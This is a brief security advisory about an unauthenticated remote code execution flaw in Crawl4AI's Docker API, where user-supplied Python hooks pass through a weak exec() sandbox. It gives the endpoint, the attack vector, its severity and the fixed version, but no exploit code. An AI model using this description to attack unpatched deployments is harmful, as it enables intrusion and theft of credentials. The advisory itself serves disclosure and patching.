Crawl4AI RCE: Hook, Line, and Sinker into Your Docker Container
Jan 17, 2026·5 min read·27 visits
Executive Summary (TL;DR)
Crawl4AI, a web scraper for LLMs, exposed an unauthenticated API endpoint that accepted custom Python code for 'hooks'. The developers attempted to sandbox this using `exec()` but accidentally allowed `__import__`. Attackers can send a JSON payload to the `/crawl` endpoint to execute system commands as root inside the Docker container, potentially stealing API keys or pivoting within the network. Fixed in version 0.8.0.
A critical Remote Code Execution (RCE) vulnerability in Crawl4AI's Docker deployment allows unauthenticated attackers to execute arbitrary Python code via the `hooks` parameter, bypassing a flimsy sandbox.
Official Patches
Technical Appendix
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:HAffected Systems
Affected Versions Detail
| Product | Affected Versions | Fixed Version |
|---|---|---|
Crawl4AI Crawl4AI (Open Source) | < 0.8.0 | 0.8.0 |
| Attribute | Detail |
|---|---|
| Vulnerability Type | Remote Code Execution (RCE) |
| CWE ID | CWE-95 (Improper Neutralization of Directives in Dynamically Evaluated Code) |
| CVSS Score | 10.0 (Critical) |
| Attack Vector | Network (API) |
| Authentication | None |
| Affected Component | Docker API / Hook Manager |
MITRE ATT&CK Mapping
The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes code syntax before using the input in a dynamic evaluation call (e.g. 'eval').
Known Exploits & Detection
Vulnerability Timeline
Subscribe to updates
Get the latest CVE analysis reports delivered to your inbox.